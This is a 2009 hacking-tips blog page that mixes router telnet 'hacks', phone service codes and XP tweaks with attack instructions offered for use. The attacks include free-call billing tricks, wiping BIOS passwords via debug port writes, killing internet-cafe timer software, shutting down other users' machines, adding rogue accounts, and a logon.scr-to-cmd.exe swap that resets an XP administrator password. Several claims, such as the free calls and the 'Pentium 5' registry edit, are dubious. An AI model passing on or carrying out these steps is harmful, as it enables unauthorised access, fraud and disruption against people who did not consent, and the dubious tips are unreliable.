Saturday, October 17, 2009

HACK YOUR ADSL MODEM(BEETEL,DIGICOM,TP-LINK,PROLINK)



HACK YOUR ADSL MODEM(BEETEL,DIGICOM,TP-LINK,PROLINK)



Hack # 1 : How to Login into RouterLogin over telnet. This is a common feature of all router these days and this the only way to hack into box:Default IP: 192.168.1.1Default Username: adminDefault Password: passwordI have changed IP of router to 192.168.1.254 so here is my first session:$ telnet 192.168.1.254Trying 192.168.1.254...Connected to 192.168.1.254.Escape character is '^]'.BCM96338 ADSL RouterLogin: adminpassword: ********Once you are logged in you will see menu:Main Menu1. ADSL Link State2. LAN3. WAN4. DNS Server5. Route Setup6. NAT7. Firewall8. Quality Of Service9. Management10. Passwords11. Reset to Default12. Save and Reboot13. Exit->Hack # 2: Get out of this stupid shell menu script/programYup, it is stupid stuff and don't waste your time hitting CTRL+C, CTRL+D keys, to get out of this script/program (break shell script), just type sh and hit enter key at arrow prompt -> -> shAnd you will be taken to shellBusyBox v1.00 (2005.09.20-19:57+0000) Built-in shell (msh)Enter 'help' for a list of built-in commands.#Hack # 3: But where is my ls command...Type ls or dir command,# lsls: not found# dirdir: not foundThey have removed the ls and dir command. But don't worry you can use old echo command trick:# echo *bin dev etc lib linuxrc mnt proc sbin usr var websecho * is old trick which displays list of all files in current directory without using ls or dir command.Hack #4: Looking for advanced web based configuration, use main.htmlYet another stupid thing, they have removed main.html from web based configuration. Basically main.html is use to configure advanced options of router like port forwarding, DNS setting, firewall etc.Just type http://192.168.1.254/main.html (replace 192.168.1.254 with your actual router IP address) to get all advanced options.Hack # 5: Get more information about router hardware and LinuxSince this is tiny device most of the userland command such as free, uname etc are removed. However /proc file system provides all information:Display CPU Information# cat /proc/cpuinfoDisplay RAM Information# cat /proc/meminfoDisplay Linux versions# cat /proc/versionLinux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Tue Sep 20 15:52:07 EDT 2005Display list of running Processes:# ps Display list of all kernel module (drivers):# cat /proc/modulesHack # 6: Get more information about your network configurationDisplay list of network interfaces# ifconfigGet default routing information i.e. find out your ISP's router:# routeDisplay Iptables rules# iptables -L -nHack 6 : Secure your router(A) Fire web browser such as firefox and login to web based interface. Type url http://192.168.1.1/ main.html (or 192.168.1.254/main.html)(B) Enable FirewallClick on Security > Ip filtering > Outgoing or Incoming > Click add(C) Change default admin passwordClick on Tools > Select Administrator and type the password. > Click apply(D) Save changes and reboot routerClick on Management > Access Control > Password > Select Admin > Setup new passwordSave changes and reboot router.
Quick reboot router with reboot command:# reboot

MOBILE HACKING CODES AND SECRET!!!HIDDEN

MOBILE HACKING CODES AND SECRET!!!HIDDEN




Secret Codes Of Nokia Mobiles:
Below we present secret codes of nokia mobile phones which are very useful for people who unlock phones and for amateurs of this topic. These special key sequences entered fromkeyboard of phone allow you to get some important information like IMEI number, release date, software version and much more. You can also choose default language, activatenetmonitor ect.
1610/1630
*#170602112302# (software version)
1610/1611
IMEI number: -*# 0 6 #Software version: -* # 1 7 0 6 0 2 1 1 2 3 9 2 #Simlock status: - # 9 2 7 0 2 6 8 9 #
2110
*#9999# (software version)
2110i/2110e
*#170602112302# or (depends on model)*#682371158412125# (software version)
NOKIA3110
*#06# -IMEI
*#3110# -Software version
##002# - allows to turn off voice mail.
*#7780# - restore factory settings
*#746025625#(or *#sim0clock#) - to check if clock of sim (SIM-Clock) can be stopped (SIM-Clock-stop is akind of standby mode which saces battery)
*#92702689# (or *#war0anty#) -"warranty code:"- you have to enter one of the following codes:
6232 (OK)displays month and year of production date (ie "0198")
7332 (OK) - displays date of last repair - if there is (ie. "DATE NOT SAVED")
7832 (OK) - displays date of purchase - if there is (ie. "DATE NOT SAVED")
9268 (OK) -displays serial number
37832 (OK) -sets purchase date in format MMYY (MM - month, YY - year)- attention: you can set it only once, so beware !
87267 (OK)-displays message "Confirm Transfer?" - meaning is unknown (?)
* # 9 2 7 0 2 6 8 9 # -Simlock info
*#31# (call) -sets if your phone no. will be hidden or not (works only in some networks)
*#76# (call) -sets if target phone number when you call should be displayed (works only in some networks)
*#77# (call) -(work s only in some networks)
*#33/35# (call -displays message "Service not active".
**31# (call) -your no. will not be showed to others when you make a call

3210
*#06# -IMEI
*#0000# -software version
*#92702689# (or *#war0anty#)- enters service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system Enhanced Full Rate .
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
xx# -Replace xx with desired phonebook entry - press # and you will see it on display.
51XX
*#06# -IMEI
*#0000# - Software version
*#92702689#( or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
#pw+1234567890+1 -provider lock status
#pw+1234567890+2 -Network lock status
#pw+1234567890+3 -Provider lock status
#pw+1234567890+4 - SimCard lock status
NOKIA 61XX
*#06# -IMEI
*#0000# ;-*#99 99# (Nokia 6130)
*#92702689# (or *#war0anty#) Software versionEnter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy.
#4720# -Turns off battery save mode.
NOKIA8810
*#06# - IMEI
*#0000# -Software version
*#92702689# (or *#war0anty#) Enter service mode.
*3370# -Turns on sound encoding system - Enhanced Full Rate.
#3370# -Turns off sound encoding system - Enhanced Full Rate.
*4720# -Turns on battery save mode - saves about 30 % of energy
#4720# -Turns off battery save mode - saves about 30 % of energy

NOKIA99OO
*#06# -IMEI
*#682371158412125# -Software version
*#3283# -Displays week and year of manufacture, ie. 1497 means 14th week of 1997.

NOKIA 911O
*#06# IMEI
*#0000# SOFTWARE VERSION
*3370# Turns on sound encoding system - Enhanced Full Rate.
#3370# Turns off sound encoding system - Enhanced Full Rate.
*4720# Turns on battery save mode - saves about 30 % of energy.
#4720# Turns off battery save mode.

NOKIA 81XX
*#06# IMEI*#8110# Software versionxx# Replace xx with desired phonebook entry - press # and you will see it on display
*#92702689# (or *#warOanty#)
"Warranty code:" - you have to enter one of the following codes:
9268 (OK) displays IMEI (International Mobile Equipment Identification)
6232 (OK) displays date of manufacture in format MMYY (MM - month, RR - year)
7832 (OK) displays date of purchase
7332 (OK) displays date of repair or upgrade
37832 (OK) sets date of purchase in format MMYY (MM - month, RR - year) - attention: you can set it only once, so beware !!!
87267 (OK) transmits user data/move data do service PC

Motorola Codes:

Motorola 920---------------
Press menu and type one of these numbers and press OK:
11 = Status Review13 = Available Networks14 = Preferred Networks22 = Select Keypad Tones25 = Require SIM Card PIN26 = Language Selection32 = Repetitive Timer33 = Single Alert Timer34 = Set IN-Call Display35 = Show Call Timers36 = Show Call Charges37 = Call Charge Settings38 = Reset All Timers43 = Reset All Timers45 = Show Last Call46 = Total For All Calls47 = Lifetime Timer51 = Change Unlock Code52 = Master Reset53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)54 = New Security Code55 = Automatic Lock63 = Battery Saving Mode
Free call tip
1 Enter the phone number2 Enter OK3 Type *#06#4 Press Button C5 And finally press the button for power off.
You should now be able to talk without being billed.
The 54# Tip:
Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number used for with this key when speed dialing.


Motorola 930--------------
Press menu and type one of these numbers and press OK:
11 = Status Review13 = Available Networks14 = Preferred Networks22 = Select Keypad Tones25 = Require SIM Card PIN26 = Language Selection32 = Repetitive Timer33 = Single Alert Timer34 = Set IN-Call Display35 = Show Call Timers36 = Show Call Charges37 = Call Charge Settings38 = Reset All Timers43 = Reset All Timers45 = Show Last Call46 = Total For All Calls47 = Lifetime Timer51 = Change Unlock Code52 = Master Reset53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)54 = New Security Code55 = Automatic Lock63 = Battery Saving Mode
Free call tip
1 Enter the phone number2 Enter OK3 Type *#06#4 Press Button C5 And finally press the button for power off.
You should now be able to talk without being billed.
Motorola 930
The 54# Tip:
Type 1#, 2#........54# on the keypad (when you're not in the menu) to get the phone number used for with this key when speed dialing.


Motorola 6200--------------

(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
These countries has been reported working:
UK (Orange)AU
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.
Pin Outs
Numbered left to right, keypad up, battery down
1. Audio Ground2. V+3. True data (TD) (input)4. Downlink - Complimentary data (CD) (input)5. Uplink - Return data (RD) (output)6. GND7. Audio Out - on/off8. Audio In9. Manual Test - ???10. Battery Feedback11. Antenna connector


Motorola 7500-------------

(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
These countries has been reported working:
IT (model: F16 HW: 5.2 SW: 2.1)
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.
Pin OutsNumbered right to left, keypad up, battery down looking
1. Gnd2. Pos3. True data (TD) (input)4. Complimentary data (CD) (input)5. Return data (RD) (output)6. Audio gnd7. Audio out8. Audioin

Motorola 8200--------------

(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
These countries has been reported working:
ES, AU, NL, BE
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.
Pin Outs
Numbered right to left, keypad up, battery down looking
1. Audio Ground2. V+3. True data (TD) (input)4. Downlink - Complimentary data (CD) (input)5. Uplink - Return data (RD) (output)6. GND7. Audio Out - on/off8. Audio In9. Manual Test - ???10. Battery Feedback11. Antenna connector


Motorola 8400-------------

(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
These countries has been reported working:
ES, AU, NL, BE
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.
Pin Outs
Numbered right to left, keypad up, battery down looking
1. Audio Ground2. V+3. True data (TD) (input)4. Downlink - Complimentary data (CD) (input)5. Uplink - Return data (RD) (output)6. GND7. Audio Out - on/off8. Audio In9. Manual Test - ???10. Battery Feedback11. Antenna connector


Motorola 8700--------------

*#06# for checking the IMEI (International Mobile Equipment Identity)
Activate RBS
(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
These countries has been reported working:
AU, IT, SG, DE, ES, ZA
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.


Motorola CD 160---------------

Press menu and type one of these numbers and press OK:
11 = Status Review13 = Available Networks14 = Preferred Networks22 = Select Keypad Tones25 = Require SIM Card PIN26 = Language Selection32 = Repetitive Timer33 = Single Alert Timer34 = Set IN-Call Display35 = Show Call Timers36 = Show Call Charges37 = Call Charge Settings38 = Reset All Timers43 = Reset All Timers45 = Show Last Call46 = Total For All Calls47 = Lifetime Timer51 = Change Unlock Code52 = Master Reset53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)54 = New Security Code55 = Automatic Lock63 = Battery Saving Mode
Free call tip
1 Enter the phone number2 Enter OK3 Type *#06#4 Press Button C5 And finally press the button for power off.
You should now be able to talk without being billed.


Motorola CD 520----------------

Press menu and type one of these numbers and press OK:
11 = Status Review13 = Available Networks14 = Preferred Networks22 = Select Keypad Tones25 = Require SIM Card PIN26 = Language Selection32 = Repetitive Timer33 = Single Alert Timer34 = Set IN-Call Display35 = Show Call Timers36 = Show Call Charges37 = Call Charge Settings38 = Reset All Timers43 = Reset All Timers45 = Show Last Call46 = Total For All Calls47 = Lifetime Timer51 = Change Unlock Code52 = Master Reset53 = Master Clear (Warning!! May result in deleting the Message Editor!!!)54 = New Security Code55 = Automatic Lock63 = Battery Saving Mode
Free call tip
1 Enter the phone number2 Enter OK3 Type *#06#4 Press Button C5 And finally press the button for power off.
You should now be able to talk without being billed.


Motorola d460--------------

#06# for checking the IMEI (International Mobile Equipment Identity)
Activate RBS
(Note: pause means the * key held in until box appears)To activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 1 [pause] [ok]You now have to press the [MENU] and scroll to the 'EngField Options' function with the keys, and enable it.
De-activate RBS
To de-activate RBS type: [pause] [pause] [pause] 1 1 3[pause] 0 [pause] [ok]This only works with some versions of software.
What's the use of RBS:
Get Distance From Base Station - Place a call, when itis answered, press [MENU] until 'Eng Field Option' isdisplayed, press [OK], select 'Active Cell', press [OK],press [MENU] until 'Time Adv xxx' appears, where xxx isa number. Multiply this number by 550, and the result isthe distance from the RBS (Radio Base Station), inmeters.
Get Signal Quality - press [MENU] until 'Eng FieldOption' is displayed, press [OK], select 'Active Cell',press [OK], press [MENU] until 'C1' appears. This is thesignal quality. If it becomes negative for longer than 5seconds, a new cell is selected.


Motorola V3688---------------

#06# for checking the IMEI (International Mobile Equipment Identity)
Enhanced Full Rate Codec (EFR):
To Enable EFR press [][][] 119 [] 1 [] OK.To Disable EFR press [][][] 119 [] 0 [] OK
NOTE: Nothing appears on Screen.


Ericsson Mobile Secret Codes:
T10
*#06# for checking the IMEI (International Mobile Equipment Identity)
>*<<*<* for checking the firmware revision information (software release) >*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.
Shortcut for Last Dialed call menu
If you for some reason don't want to enter the 'Last Dialed calls menu' by using the 'YES' key you can use the following keystroke instead: First '0' then '#'.
Access menu without Sim card
To access to the menu in your phone without having a card inside do the following: type **04*0000*0000*0000# When display say "Wrong Pin" press NO and you have access to the all menus: Info, Access, Settings, Calculator, Clock, Keylock On?, Mail, Phone book. NOTE if you try this on your phone may stop at Keylock On? menu and you´ll have to take your battery out to turn the phone on again. And this will not care about Phone lock!
A way to (un)lock your cell phone on to the network(subset):1. Press <**<2. tac =" Type" codefac =" Final" codesnr =" Serial" numbersp =" Spare">*<<*<* for checking the firmware revision information (software release) >*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in currently selected language.
>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.
The Service Provider (SP) Lock
The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it! The cell phone will however accept another SIM card from the same operator.
To activate/deactivate this lock one needs a special secret code that is not available to the end user.
Here is how to activate the menu:
<**<>*<<*<* for checking the firmware revision information (software release) >*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in currently selected language.(298 entries)
>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.(160 entries?)
The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it! The cell phone will however accept another SIM card from the same operator.
To activate/deactivate this lock one needs a special secret code that is not available to the end user. (not even to you... or is it ? in case please let me know!)
<**<>*<<*<* for checking the firmware revision information (software release) >*<<*<*> 1-row text strings. if pressing yes you can check the phones text programming in currently selected language.(298 entries)
>*<<*<*>> n-row text strings. if pressing yes you can check the phones text programming in currently selected language.(160 entries?)
The Service Provider (SP) Lock
The Service Provider (SP) Lock menu is used to lock the cell phone to the SP's SIM card. Once the cell phone is locked to a specific operator, if one inserts a SIM card from a different operator the phone will refuse to accept it! The cell phone will however accept another SIM card from the same operator.
To activate/deactivate this lock one needs a special secret code that is not available to the end user.
Here is how to activate the menu:
<**<> key for a second or two The option Menu size turns up Choose 'yes' and go from there.
An alarm clock turned up too but it never rang. I think this was because there is no clock in the phone.
Free phone calls using the GA628
This trick has only been reported working on PREPAID GSM CARDS and in some countries and with some sw versions.The prepaid GSM SIM CARD is a kind of "SIM card" which only has a sertant amount of credit on it (like a normal phonebox telecard)... if it can be traced? - we don't know...
Well..here's the trick you dial the no. normally and press YES. While "connecting" is shown on the screen, the following procedure should be carried out: Press CLR then 0 then # and then NO (twice) so as to switch OFF the phone. You can then still speak on the phone while it is switched off but the SIM card does not record your calls which will lead to FREE phone calls in some countries.. we hope!!
Another variant of the code
Make a Call, while the phone says Connecting type 083# (the position 83 must be empty! ), when phone says Pos Emtpy, press the NO key and turn off the phone.
If you can make the call with the phone turned off you will face a problem when you need to hang up the phone...the only way for you to do that is remove the battery...???

CREATE YOUR OWN ANTIVIRUS FOR FREE

CREATE YOUR OWN ANTIVIRUS FOR FREE

Hello friends these is aruj parajuli .The problem is when i reinstall windows, my id changes fromadmin to admin.windows or administrator.whateverI want %% to be used so that the batchfile can locate theWindows XP directory and my documents and settings folder.
Any help will be appreciated.
*********************************************
copy following code in notepad..and save as aruj.bat and run it


@echo off
if %username% == Administrator.WINDOWS goto admin
REM ** Delete User Files **
rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
goto end

:adminREM ** Do some extra stuff here **REM ** What ever you want..... **
ECHO You are a Administrator
rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Recent"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temp"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\History\History.ie5"rmdir /S/Q "%systemdrive%\Documents and Settings\%username%\Local Settings\Temporary Internet Files\content.ie5"
REM ** Do more stuff here **REM ** Blah, blah, blah......**

:endexit

USE GMAIL IN MSN MESSENGER

USE GMAIL IN MSN MESSENGER

i think all of you know it but if someone dont than here it isgo to this page:
https://register.passport.net/default.srf?sl=1
enter you gmail account as the email address
fill all the other blanks and continue the registration
go to your gmail account and verify the registration and know sign in with msn

actually this works will all emails not only gmail

BURN CD IN 3 MIN 26 SEC TESTED

BURN CD IN 3 MIN 26 SEC TESTED


windows xp has burning software built in which can cause problems sometimes when burning with other programs.
you can turn windows xp burning tool off like this.
Go to "administrative tools" in the control panel.
In the "services" list, disable the IMAPI CD-Burning COM service.

BOOT YOUR XP AS FAST AS SPEED OF LIGHT

BOOT YOUR XP AS FAST AS SPEED OF LIGHT


First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:
1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.
WindowsXP should now boot REALLY faster.

HACK BIOS EASILY

HACK BIOS EASILY


Wana hack hack bios it's easiest method of hacking worldwide


Follow the steps below:1) Boot up windows.
2) go to dos-prompt or go to command prompt directly from the windows start up menu.3) type the command at the prompt: “debug” (without quotes ninja.gif )4) type the following lines now exactly as given…….o 70 10o 71 20quitexit4) exit from the dos prompt and restart the machinepassword protection gone!!!!!!!!!!!!!

please post comment

MAKE PC PENTIUM 5 IN 1 MIN

MAKE PC PENTIUM 5 IN 1 MIN



FOLOW THE STEP:
GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>SYSTEM>CENTRAL PROCESSOR>ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSOR NAME AND STRING AND THE CLICK ON MODIFY AND WRITE WHAT EVER YOU WANTOR NAME IT PENTIUM 5 OR MORE
HEYY FRNDS DO REPLY in guestbook IF U LIKE THIS TRICK

INTERNET CAFE HACKING FOR UNLIMITED TIME 100%TESTED

INTERNET CAFE HACKING FOR UNLIMITED TIME 100%TESTED



Basic overview of this tutorial is if there's some kind of timer or clientsoftware on the computer you're using at the Net Cafe you can hopefully disable it.
Firstly we need to gain access to command prompt (cmd.exe) to do this there's a fewways.
1) The most basic is to go Start/Run/cmd.exe and a black input screen should pop up.Say that's disabled then we can try some other methods.
2) Press the Windows Logo + R and it will start run up. (hopefully)
3) Navigate your way to C:\WINDOWS\system32 and run cmd.exe from in there.
4) Open notepad type "cmd.exe" without the quotation marks ("") and thengo to File/Save As.. and type the name for the file and have it end with.bat for example "MyNewFile.bat" and select Save as type and select All Files.
Make sure to save it somewhere you can access it, Like the desktop.
If they have deleted Notepad then go in to Internet Explorer and right clickand select View Source or on the menu bar click View then source and perform thesame process as above.
Once you have done this you can run the file. If you can't open files from the desktopthen go back into Internet Explorer and go to View/Explorer Bar/Folders and navigate tothe Desktop and it will show the saves files on the desktop in a folder type window.
Once you have access to command prompt you can perform some usefull actions e.g shutdownprograms, shutdown other peoples computers, add new accounts.
Ok, well most Net cafes have software running that boots you off of the machine after a certainammount of time unless you pay for more time. Well, we don't want that to happen now do we?
Firstly try figure out the Net Cafes timeing/credit softwares name cause this can help.

For more info on the software running we can use the command "tasklist" inside of command prompt.
example: "tasklist" (without quotation marks)
Basicly it brings up all the processes running.
Now say we know the process name for the Net Cafes software we need to disable it. So, how do we do that?we use "taskkill" >:]
Basicly kills the process we specifcy. Say the Net Cafes software is "Timer.exe" for example and it's shown inthe task list like that we would do this.
example: "taskkill /im Timer.exe /f"
/im : is for image name. Not quite sure what it means, but we need it.
Timer.exe : that's the Net cafes software/process name (example)
/f : Forcefully shuts the program.
Now hopefully your Net Cafes software is terminated and you can freely use their computer with no time restriction.
If you have no luck finding the Net Cafes software name then just try ending processes that Windows Doesn't rely on.

Perhaps you want to have a little fun with people on the network at the Net cafe? well here's a few things for youto do with command prompt.
Find the people on the network with "net view" and it will list the other computers names on the network.
The shutdown command. Basically the shutdown command will shutdown a computer on the network or your own computer (comes inhandy)
example: "shutdown -s -m HJCPwnts -t 20 -c You're being shutdown"
use "shutdown -a" to cancel this action so you don't shut your own computer down.
-s : sets the shutdown action.
-m : specify the computer name (HJCPwts) that's what my computer name would be on the network. (to find outhow to find computer names use net view. It will list the other computer names.)
-t : the time until shutdown in seconds. Just specify it for 0 if you want it instant.
-c : the comment that will be shown on the shutdown window (not needed, but goo to leave the victim a message)
-f : I left this one out because it shuts the applications the user is running down, but add it on the end when doingit to someone else.
Now for some more stuff. Perhaps we want to create a new account on this computer and login to it? Well, lets do it then. Ok, this is how we do it.
In command prompt type "net user ARUJ /add" this basically adds a new user by the name of ARUJ. Simple ehh?well we have struck a problemo. How the hell do we login to that account? EASY!
In fact we have already covered most of it. We will be using the shutdown command again.
"shutdown -l" : basicly this logs us out and we can log back in with the ARUJ account.
-l : sets the logout action.
Ok, so you have had your fun with the new account now and you want to get rid of it in caseof the Net Cafe staff finding it. Well that's simple aswell, all we do is..
"net user ARUJ /delete" and it will delete that user. Make sure to check it has beendeleted by using "net user" and it will show the accounts.

HOW TO HACK WINDOW XP PASWORD BY NEW METHOD

HOW TO HACK WINDOW XP PASWORD BY NEW METHOD





If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.

Once this happens if you enter this command :

net user password

If the Administrator Account is called ARUJ and you want the password PARAJULI enter this

net user ARUJ PARAJULI
and this changes the password on franks machine to blah and your in.


Have Fun!

XP HACK!!!100% WORKING


XP HACK!!!100% WORKING


Well some of dese tricks are quite common now but still i would like to go ahead keeping in mind d NOVICE users

PLEASE DROP IN YOUR COMMENTS AT THE END OF THE PAGE
New tricks UPDATED. 20/jan/07
Scroll to the bottom

Related Article
All keyboard ShortcutsChange Start logo in XpDos Tricks and ShortcutsAll Dos CommandsClear CMOS all Trickssolitare and games cheatsSpeed up Booting Xp by 61 TimesSpeed Up Internet Explorer (IE) HackXp problems and their solutionsXp Tricks Contd.. More of DemXPHacking With Windows XP


shtcut to restarting xp..
You can restart a Windows XP Pro and Home machine easily by creating a shortcut with following path. (Assume you installed Windows XP on your C: Partition) "c:\windows\system32\shutdown.exe -r -f -t 00" -r is for restarting the computer. -f is to force close all programs without saving. -t 00 is used to restart in zero seconds. i.e. as soon as you D.Click on the shortcut. You can log off from a Windows XP Professional or Home edition by running "C:\windows\system32\shutdown.exe -l -f -t 00". Also you can shutdown a Windows XP Home or Professional edition by running "c:\windows\system32\shutdown.exe -s -f -t 00". You always have to turn from the CPU after running this command. (Same with AT and ATX powered machines.) If you want to turn down power of ATX machine automatically, run "c:\windows\system32\tsshutdn.exe 00 /POWERDOWN /DELAY:00" This is used to turn off a server. Even though your computer will be shutdown completely, this whole operation will take 30 seconds to finish. Even though you don't have networked computers attached to your computer, this works.
1) Disabling Display of Drives in My Computer :
This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows: REGEDIT4 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r] "NoDrives"=dword:03ffffff



2) Pop a banner each time Windows Boots :
